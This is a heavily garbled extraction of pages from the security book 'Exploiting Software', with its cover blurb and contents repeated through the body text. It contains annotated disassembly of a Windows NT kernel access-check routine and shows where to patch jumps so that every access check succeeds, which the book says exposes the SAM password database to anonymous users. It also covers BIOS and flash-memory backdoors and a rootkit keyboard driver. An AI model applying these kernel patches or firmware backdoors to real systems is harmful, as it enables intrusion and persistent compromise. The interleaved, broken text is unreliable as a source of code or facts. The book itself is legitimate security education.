; Access is allowed only ; EDI is completely blank How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak ;onby p urthe pose? Whyweareare done time fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reakjzsoft war e?loc_80199B79 Th is book p rov ides t he answ er s.; jumps to exit ro 80199AE9 Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er;ns,ift ools, EDI an isd blank t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he 80199AEF test byte ptr [esi+1], 8 ; checks for ACE v scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t ; 8, second byte.. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem ; I don't know wha When net w or k secur it y m ech anisms do n ot w or k ; this is, but if At t ack pat t er ns ; not 8, it's not Rev er se engineer in g ; evaluated, not Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e

; important

80199AF3 jnz short loc_80199B64 Tech niqu es f or cr aft ing m aliciou s inpu t 80199AF5 mov al, [esi] The t echn ical det ails of b uf fer ov er f low s

; this is the ACE ; which is 0, 1, o

Root k it s

80199AF7 test al, ; 0 yist o ALLOWED_TYP Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, conal cept s, and kn ow ledg e necessar b reak soft w ar e. ; 1 is DENIED_TYPE 80199AF9

jnz

short loc_80199B14

; jump to next block if ; it's not type 0

80199AFB

lea

eax, [esi+8]

; offset 8 is the

80199AFE

push

eax

80199AFF

push

[ebp+var_8]

80199B02

call

sub_801997C2

; pushes the ACE

; checks to see if ; caller matches t



Table of Content s



I ndex

; SID return of 1

Expl oit ing Softw a re How to Br e ak Code

; we matched, 0 me

By Gr eg Hoglund , Gar y McGr aw

; we did not Pub lish er: Addison Wesley

80199B07 Pub Dat e:

February 17, 200 4

test

al, al

jz

short loc_80199B64

I SBN: 0- 20 1- 786 95 -8

80199B09

Pages: 51 2

; a match here is good, ; since its the AL ; list

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? are ; soWhy a 2-byte patc fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s.; nop out this jum Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er;ns, t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Here is wh er e w e id en t ify t h e fir st bit of code t o be pat ch ed . A com par ison is m ade bet w een t he t ar get ' s requ ired access cont r ol and t h e sour ce' s ident it y . I f a m at ch occur s h er e, t h is means t ha sour ce is allow access t ar get . This is ga ood, b ecause as at t ack er s w e alway s w an t access Why sof t wed ar teoex ploit wt hille con t inue t o be ser ious p r oblem jz ( jum p if zer o) only occur s if w e fail t h e m at ch. Thu s, t o ensur e w e alw ay s m at ch, w e j ust nop t he jzWhen in st r unet ct ion . This t akites 2 ech by t es ( 0x90do0x90) We w or k secur y m anisms n ot w. or k are not d one y et , t hou gh, t her e ar e a f ew m or e places t hat we need t o pat ch: At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t 80199B0B mov eax, [esi+4] The t echn ical det ails of b uf fer ov er f low s 80199B0E Root k it s

not

eax

80199B10 and edi, ; ow whittles off the Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, coneax cept s, and kn ledg e necessar y t o part b reak soft w ar e. ; of EDI that we ; matched .. ; this chopping of ; flags can go on thr

; many loops ; remember, we are on ; good if ALL of EDI ; chopped away... •

Table of Content s



I ndex

80199B12

jmp

short loc_80199B64

Expl oit ing Softw a re How to Br e ak Code

80199B14 ;

By Gr eg Hoglund , Gar y McGr aw

=========================================================================== Pub lish er: Addison Wesley

80199B14 Pub Dat e:

February 17, 200 4

I SBN: 0- 20 1- 786 95 -8

80199B14 loc_80199B14:

; CODE

Pages: 51 2

XREF: sub_80199836+2

80199B14

cmp

al, 4

; check for ACE type

80199B16

jnz

short loc_80199B4B; normally we aren't

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur Why areso jump ; pose? this type, fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Whatremoved t ools cansource be u sedhere t o b reak *** *** soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g;S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d 80199B4B t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . =========================================================================== This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he 80199B4B scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t 80199B4B loc_80199B4B:

; CODE

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem 80199B4B cmp al, 1 When net w or k secur it y m ech anisms do n ot w or k 80199B4D jnz short loc_80199B64 At t ack pat t er ns 80199B4F lea eax, [esi+8] Rev er se engineer in g 80199B52 push eax Classic at t acks ag ainst serv er soft w ar e 80199B53 push [ebp+var_8] Sur pr ising at t acks ag ainst clien t soft war e

XREF: sub_80199836+2 ; check for DENIED ty

; offset 8 is the SID

80199B56 call sub_801997C2 Tech niqu es f or cr aft ing m aliciou s inpu t

; check the callers S

80199B5B test al, al The t echn ical det ails of b uf fer ov er f low s

; a match here is BAD

Root k it s

; since we are being

; DENIED Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. 80199B5D jz short loc_80199B64; so make JZ a normal ; JMP

Here we discov er one m or e place t hat needs t o be p at ch ed . The pr ev ious com par ison is m ade be

t he sou rce an d t he t ar get r equ ir em en t s. I n t h is case, if a m at ch occu rs, w e ar e ex plicit ly denied access. Obv iously t his is b ad and w e w ant t o av oid t he m at ch. Th e jz on ly ju mp s if t he m at ch fa t his case, w e alw ays wan t t h e ju m p t o occu r. We can pat ch t he jz t o m ak e it a st r aigh t jmp t hat alway s j um p r eg ard less of t h e pr eceding logic.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

80199B5F Pub lish er:

Addison Wesley

test

[esi+4], edi

; we avoid this flag

Pub Dat e: February 17, 200 4

; check w/ the patch

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

80199B62

jnz

short loc_80199B79

80199B64 80199B64 loc_80199B64: ; CODE XREF: sub_8019983 How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot; ksub_80199836+2D3 eep in g out t he bad g uy s? 80199B64 What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. 80199B64 mov ecx, [ebp+var_10] ; our loop routine, Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y;our sof t w ar e fr om called from above a at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . ; we loop around and This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t ; around. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

; var_10 is the numbe

When net w or k secur it y m ech anisms do n ot w or k

; of ACEs

80199B67 At t ack pat t er ns

inc

[ebp+var_C]

; var_C is the curren

Rev er se engineer in g

; ACE

Classic at t acks ag ainst serv er soft w ar e 80199B6A movzx eax, word ptr [esi+2] Sur pr ising at t acks ag ainst clien t soft war e

; byte 3 is the offse ; to the next ACE

Tech niqu es f or cr aft ing m aliciou s inpu t 80199B6E add esi, eax

; FFWD

The t echn ical det ails of b uf fer ov er f low s 80199B70 cmp [ebp+var_C], ecx

; check to see if we

Root k it s ; are done Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak 80199B73 jb loc_80199AE7 ; if not, go back up. soft w ar e. 80199B79 80199B79 loc_80199B79:

; CODE

80199B79

; sub_80199836+2B3

80199B79

xor

eax, eax

XREF: sub_8019983

; this is our general

; exit routine 80199B7B

test

edi, edi

; if EDI isn't empty, ; then a DENIED state ; was reached above



Table of Content s

80199B7D •

I ndex

jz

short loc_80199B91 ; so patch the JZ into

Expl oit ing Softw a re How to Br e ak Code

; a JMP so we never

By Gr eg Hoglund , Gar y McGr aw

; return ACCESS_DENIE Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

;

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

A f inal check is m ade h er e t o det erm ine wh at t h e r esult of t he call w ill be. I f any of t he p rev iou s r esult s in a denied st at e, t hen t h e jz w ill n ot j um p. W e obv iously w ant t he j um p t o occu r no m a w hat , so w e ( once again ) pat ch t h e jz in t o a jmp. Th is is t he f inal p at ch , and t h e rou t ine w ill now How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are alw ays ev aluat e t o TRUE. Th e r est of t he r out in e follow s f or t hose w ho ar e int erest ed in t he cod e fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t 80199B7F mov ecx, [ebp+arg_1C] Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem 80199B82 mov [ecx], eax When net w or k secur it y m ech anisms do n ot w or k 80199B84 mov eax, [ebp+arg_24] At t ack pat t er ns ; STATUS_ACCESS_DENIED Rev er se engineer in g 80199B87 mov dword ptr [eax], 0C0000022h Classic at t acks ag ainst serv er soft w ar e 80199B8D xor al, al Sur pr ising at t acks ag ainst clien t soft war e 80199B8F short loc_80199C0C Tech niqu es f or cr aft ing mjmp aliciou s inpu t 80199B91 ; The t echn ical det ails of b uf fer ov er f low s =========================================================================== Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak 80199B91 soft w ar e. 80199B91 loc_80199B91: ; CODE XREF: sub_8019983 80199B91

mov

eax, [ebp+1Ch]

80199B94

mov

ecx, [ebp+arg_1C]

; result code into ; &arg_1C

80199B97

or

eax, [ebp+arg_C]

; checked passed in ; mask

80199B9A

mov

[ecx],

80199B9C

mov

ecx, [ebp+arg_24]



Table of Content s



I ndex

eax ; result code into ; &arg_24, shoul

Expl oit ing Softw a re How to Br e ak Code

; zero

By Gr eg Hoglund , Gar y McGr aw

80199B9F

jnz

short loc_80199BAB

; if everything above

Pub lish er: Addison Wesley

; went OK, we sh

Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

jump

Pages: 51 2

80199BA1

xor

al, al

80199BA3

mov

dword ptr [ecx], 0C0000022h

How d oes sof t w are br eak ? Howjmp do at t acker s m ake sof t w ar e br eak on p ur pose? Why are 80199BA9 short loc_80199C0C fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools ;can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. 80199BAB Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d =========================================================================== t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . 80199BAB This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he 80199BAB loc_80199BAB: ; CODE XREF: sub_8019983 scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t 80199BAB

mov

dword ptr [ecx], 0

; Good and Happy

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem ; things, we passed! When net w or k secur it y m ech anisms do n ot w or k 80199BB1 test ebx, ebx At t ack pat t er ns 80199BB3 jz short loc_80199C0A Rev er se engineer in g 80199BB5 push [ebp+arg_20] Classic at t acks ag ainst serv er soft w ar e 80199BB8 push dword ptr [ebp+var_2] Sur pr ising at t acks ag ainst clien t soft war e 80199BBB push dword ptr [ebp-1] Tech niqu es f or cr aft ing m aliciou s inpu t 80199BBE push ebx The t echn ical det ails of b uf fer ov er f low s 80199BBF Root k it s

call

sub_8019DC80

80199BC4 jmp short Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, conloc_80199C0A cept s, and kn ow ledg e necessar y t o b reak soft w ar e. 80199BC6 ; =========================================================================== removed code here 80199C0A loc_80199C0A:

; CODE

XREF: sub_8019983

80199C0A

; sub_80199836+152

80199C0A

mov

al, 1

80199C0C 80199C0C loc_80199C0C: •

Table of Content s



I ndex

80199C0C

; CODE

; sub_80199836+8F

Expl oit ing Softw a re How to Br e ak Code

80199C0C

XREF: sub_8019983

pop

edi

pop

esi

pop

ebx

80199C0F

mov

esp, ebp

80199C11

pop

ebp

80199C12

retn

28h

By Gr eg Hoglund , Gar y McGr aw

80199C0D Pub lish er: Addison Wesley

80199C0E Pub Dat e:

February 17, 200 4

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

; Outta Here!

How d oes sof t w are br eak ? Howendp do at t acker s m ake sof t w ar e br eak on p ur pose? Why are 80199C12 sub_80199836 fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu esofused s tshow o br eak sofet w e. I af yrem ou w t o pcan rot ect our sof ommachin The r esult t h e by k erbad nel pguy at ch n her is ar t hat otant e user conynect t o tt w heart e arfrget at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . using t he anony m ous I PC$ pip e, no p assw or d requ ir ed, an d k ill any p rocess, d ow nload t h e SAM ( equiv alen t of a user/ p assw or d file) dat ab ase, m od if y t he SAM dat ab ase, an d u pload/ ov er w r it e t This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he SAM dat abase . Th is is not good. The anon ym ous user can oper at e lik e a dev ice dr iv er and acces scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t par t of t he t r ust ed com p ut ing base in t he t arg et dom ain. UsingWhy ou r US p le, t h con is mt inue ean s ttohat com put pr ogr am oper at ing any w here wit h in sof tnav w arye exam ex ploit w ill be any a ser ious p rer oblem NT d om ain can access any ot h er par t of t h e dom ain wit h im pun it y. So, w hy d oes t he nav y insist using When NT? net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

The Hardware Virus While w e ar e in t he k er nel, w e hav e fu ll access t o t he sy st em an d w e can com mu nicat e w it h an y t he addr ess sp ace. Th is means, am on g ot her t hings, t hat w e can r ead / w rit e t o t h e BI OS m emor y m ot her boar d or in p er iph er al h ar dw are. •

Table of Content s

•I n t he " old day I ndex s," BI OS m em ory was st or ed in ROM or in EEPROM chips, w h ich could not be up d Expl ingt Softw Br e ak fr omoitsof w are.a re ThHow ese to older syCode st em s r equir e t h e ch ips t o be r eplaced or m anu ally er ased an d r ew OfGrcour se t his, Gar isn'y t McGr v eryawcost ef fect ive, so new syst em s use EEPROM chips, ot her w ise kn own as fl By eg Hoglund ROM. Flash ROM can be rew r it t en f rom sof t w ar e. Pub lish er: Addison Wesley A g iven com p ut er can h ave sev er al m egab yt es of f lash ROM f loat ing arou nd on var ious con t rolle 17, .200 4 andPub t h eDat me:otFebruary herb oard These flash ROM chips ar e alm ost n ev er fu lly ut iliz ed , and t his leav es u s I SBN: 20 1786t95 t r emend ous0-am oun s -8 of r oom t o st or e b ack door in for m at ion and vir uses. The com pellin g t h ing a using Pages: t hese 51 m2em or y spaces is t hat t hey ar e har d t o audit and almost never v isib le t o sof t w are r u on a sy st em . To access t he h ard w are mem or y r eq uires d riv er- lev el access. Fu rt h er m or e, t his m e im mu ne ag ain st r eb oot s and sy st em r einst allat ion.

On e key ad van t age of a har dw ar e vir us is t hat it w ill sur viv e a reboot and a sy st em r einst allat ion som eon e su sp ect s a v ir al in fect ion, r est or ing t h e sy st em fr om t ape or b ack up w ill not help. Th e How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are har dw ar e v iru s has alw ay s been and w ill rem ain on e of t he best k ep t secr et s of t he " black mag ic fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? hack er s. Ther e is a disad van t age t o har dw ar e v iru ses, h owev er . Th ey only w or k on a par t icular t What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. That is, any g iv en har dw ar e vir us mu st be w r it t en t o inf ect t he sp ecific h ard w are of t he t ar get . T m ean heg vir w aillren is ot loaded easily pwr opagat e t oles ot her sy statem s (s, if itat can opagat ed atanall) Ex p losi ttin S ous ft w it h ex amp of r eal t ack t ack be patpr t er ns, t ools, d . This i pr oblem f or m any u ses in w arf ar e, how ev er . Many t imes t h e har dw ar e v iru s is being used t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om as a b or et hod g nt raf fic.r eal I n t at hist acks case,are a vreally iru s mcarr ay not need at t as acka, m y ou m u stoffirsnstif fin lear h ow ied ou t . t o self- replicat e. I n f act , self r ep licat ion m ay not be d esir ed . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he A har dt rwar ir us m ay in be mdesign ed t ing o imp ar t s,f alse t o a sy st em scrsim ipt ple k id die eat emven t f ound any hack book you dwatilla learn abou t or t o cause t h e syst e ignor e cer t ain ev en t s. I mag ine an ant i- air cr af t r adar t hat uses t he VX- Wor k s OS. W it hin t he syst sev er al flash RAM ch ip s. A v ir us inst alled in one of t h ese chips has t r ust ed access t o t h e ent ir e b v iru s Why has on pose—t cause t het or ad t o ig nor pe rcer t ain t y pes of rad ar signat u res. soflyt wone ar epu exrploit w illo con t inue bear a ser ious oblem Vir uses h avenet lon b een ect ed in tdo he nwot ildwt or hat When wg or since k secur it y mdet ech anisms k wr it e t h em selves int o t he m ot h er boar d BI m em or y . I n t he lat e 1 990 s, t he so- called F00F b ug w as able t o cr ash a lapt op com plet ely . Alt hou t ack t er ns CI H vAt ir us ( ofpat Chern oby l) w as w idely popu larized in t he m ed ia, v ir u s cod e t hat used t he BI OS w a pu blish ed long bef ore t he r elease of CI H. [ 3] Rev er se engineer in g [ 3]

. For m ore on CI H, go to http: / / w w w .f- secur e.com / cih/ .

Classic at t acks ag ainst serv er soft w ar e EEPROM m em or y is f air ly com mon on m any sy st em s. Et hern et card s, vid eo car ds, an d mu lt imed per ipher m ay at allt acks cont ag ainainst EEPROM em war or y.eTh e har dw ar e m emor y m ay cont ain f lash fir m w are Surals pr ising clien tmsoft fir m w ar e may just be u sed for d at a st or age. I n t he case of a b ackd oor, over w rit ing f irm w ar e is s Tech niqu es f or cr aft ing m s inpu t persist ev en if t he sy st em is cleaned and r einst alled t o ot her app roaches b ecause t haliciou e change w ill cour se, t he t ask of ov er w r it ing fir m war e r equir es a d et ailed und er st and in g of t he t ar get har dw ar Theal. t echn ails of ovher er f low s d BI OS, t he p r ocedu re is fair ly st r aigh t for w ar d. per ipher But ical in t hdet e case ofbtuf hefer m ot boar Root k it s

Reading Memory Ex p lo i t in g Sand o ft w Writing a re is f illedHardware wit h t h e t ools, con cept s,

and kn ow ledg e necessar y t o b reak soft w ar e. Nonv olat ile m em or y chips ar e f ound in a v ar iet y of h ar dw ar e devices: TV t u ner s and r em ot e con CD play ers, cor dless and cellular ph ones, fax m achines, cam er as, r adios, aut om ot iv e air bags, an br ak es, od om et er s, key less ent r y sy st em s, pr int er s and copiers, m od em s, pag er s, sat ellit e r ecei bar code r eaders, p oint - of - sale t er m inals, smar t car ds, lock b oxes, gar age d oor opener s, and t es m easu rem en t equ ipm en t . Flash ROM can be accessed b y sim ple in an d out in st r u ct ion s. Typ ically a f lash ROM ch ip w ill co cont r ol r egist er and a d at a por t . Com man d messages are placed in t he cont r ol r egist er and t he d

is used t o r ead or w rit e t o t he flash m em ory . I n som e cases, t he m em ory used by t he chip is " m int o phy sical mem or y, w hich m eans it can b e accessed as nor m al linear m emor y . Ty pically , a com m and is " shif t ed " t o t he ROM ch ip v ia t h e out in st r u ct ion . Dependin g on t h e lang t he in an d out in st r u ct ion s m ay hav e subt le d iffer ences, b ut ot herw ise t hey ar e all d oing t he sam t hin g. For exam p le: •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

OUT( some_byte_value, eeprom_register_address ); I SBN: 0- 20 1- 786 95 -8

Pages: 51 2

On an NT PC syst em , t her e ar e chun ks of m em or y map ped bet w een F0000000 an d FFFFFFFF t ha cont ain em p t y spaces. A backd oor or r oot k it p rog ram m ay only consum e a few hu ndr ed by t es, s How edem oesptsof t wace are tbr at t acker s mn ake t w ardiff e br on p rur pose?ofWhy som y sp o eak st or?e How suchdo a beast m ay ot b esoft hat icueak lt . This egion m emare or y is cons ew alls, intipru sion det ectt he ionmsyotsther emboar s, and ant ivmiremor us soft n ot 0000 k eep in t heu sually bad g uy vfirariou s per herals and d. The y bwar et weeen angdout FFFF st s? ores Whatt / tout ools can t o b sreak Th is idesigur t hee answ er s. on h ard w are, an d so inpu p ut porbe t s uofsed v ariou devsoft iceswar ande?can bebook usedp trov o conf set t ings The r egion bet w een F9000 an d F9FFF is a 4K ch unk reser v ed f or t h e mot herb oard BI OS. Th e r eg Ex i t inA0000 g S o ftan wda re is loaded w itfhorex amp at tdack pat t erat ns, t ools, an d betpwlo een C7FFF is used vid eo les buf of ferrseal andat vt ack ideos, car conf igur ion. t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t .

Example: Read/Write to the Keyboard This m ust - h ave book m ay shock y ou—and it will cerHardware t ainly educat e y ou. Get t ing

bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Here we illust r at e r eading and w r it ing t o h ard w are u sin g a r oot k it . Our ex am ple w ill set t he LED indicat or s on t he key boar d. For f un, we also illust r at e h ow t o har d boot t he com put er . This is a v Why sof t w ar tehose ex ploit illan con ious plex r oblem st ar t ing place for w how w t ttoinue contt or olbemaorser e comp h ard w are fr om a root k it . netfor w ormk of secur y unicat m ech anisms ot w or k u sin g t he LEDs of t h e key boar d. Th e 80 4 An intWhen erest ing comitm ion can do b endesig ned k ey boar d cont r oller chip can be used t o t u rn on / off t h e var ious k ey boar d LEDs. Th is can b e used At t ack pat t er ns cover t f or m of comm u nicat ion b et w een a r oot kit and t he user of a t er minal. Rev er se engineer in g Ou r code is com ment ed inline: Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s // BASIC DEVICE DRIVER TO SET KEYBOARD LEDs Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. www.rootkit.com // from #include "ntddk.h" #include

VOID rootkit_command_thread(PVOID context);

HANDLE gWorkerThread; PKTIMER PKDPC

gTimer; gDPCP;

UCHAR g_key_bits = 0; •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

What f ollow are v ar ious " d ef ines" for t he h ard w are op er at ion . These are foun d in t h e docum ent a t he 804 2 k eyb oard cont r oller chip. Th e inpu t / out p ut " por t " is 0 x6 0 or 0x 64, depending on t he op Pub lish er: Addison Wesley These por t s ar e d esigned for sing le- b yt e operat ion s. The com m and by t e t hat indicat es t hat w e w Pub Dat e: February 17, 200 4 set t he LED s is 0x ED. I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. // commands Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d #define READ_CONTROLLER t echniqu es used by bad guy s t o br eak 0x20 sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . #define WRITE_CONTROLLER 0x60 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t // command bytes Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem #define SET_LEDS 0xED When net w or k secur it y m ech anisms do n ot w or k #define KEY_RESET At t ack pat t er ns

0xFF

Rev er se engineer in g // responses fromag keyboard Classic at t acks ainst serv er soft w ar e #define 0xFA Sur prKEY_ACK ising at t acks ag ainst clien t soft war// e ack #define TechKEY_AGAIN niqu es f or cr aft ing m aliciou 0xFE s inpu t // send again The t echn ical det ails of b uf fer ov er f low s Rootports k it s // 8042 Ex lo i t in you g S o read ft w a re is f illed wit 64, h t h ethis t ools,is concalled cept s, and kn ow ledg e necessar y t o b reak // pwhen from port STATUS_BYTE soft w ar e. // when you write to port 64, this is called COMMAND_BYTE // read and write on port 64 is called DATA_BYTE PUCHAR KEYBOARD_PORT_60 = (PUCHAR)0x60; PUCHAR KEYBOARD_PORT_64 = (PUCHAR)0x64;

// status register bits #define IBUFFER_FULL

0x02

#define OBUFFER_FULL

0x01



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg w Hoglund , Gar y McGr When e sen d t he comaw man d for set t ing t he LEDs, w e m u st imm ediat ely follow t he com man d w it anot h er by t e. The secon d b yt e indicat es w hich LEDs w e wan t t o t ogg le. Th e follow ing bit s r epr es scr oll m lock , an d caps lock in dicat ors. A bit set t o 1 causes t he cor respond ing LED t o be Publock lish er:, nu Addison Wesley illum in at ed. Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools for can be u sed t o LEDS b reak soft war e? Th is book p rov ides t he answ er s. // flags keyboard Ex p lo i t in SCROLL_LOCK_BIT g S o ft w a re is loaded w it h ex amp les r eal at t ack s, at t ack pat t er ns, t ools, an d #define (0x01 addr_unlock1, e CFI_DEVICETYPE_X8, Tech niqu es f or cr aft NULL); ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low scfi->addr_unlock2, base, map, cfi, cfi_send_gen_cmd(0x55, Root k it s CFI_DEVICETYPE_X8, NULL); Ex p lo }i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. cfi_send_gen_cmd(0x90, cfi->addr_unlock1, base, map, cfi, CFI_DEVICETYPE_X8, NULL);

followed by

static inline u32 jedec_read_mfr(struct map_info *map, __u32 base, struct cfi_private *cfi) { • •

Table of Content s u32 result, mask; I ndex

Expl oit ing Softw a re How to Br e ak Code

mask = (1 device_type * 8)) -1;

By Gr eg Hoglund , Gar y McGr aw

result = cfi_read(map, base); Pub lish er: Addison Wesley

result &= mask;

Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

return result; Pages: 51 2

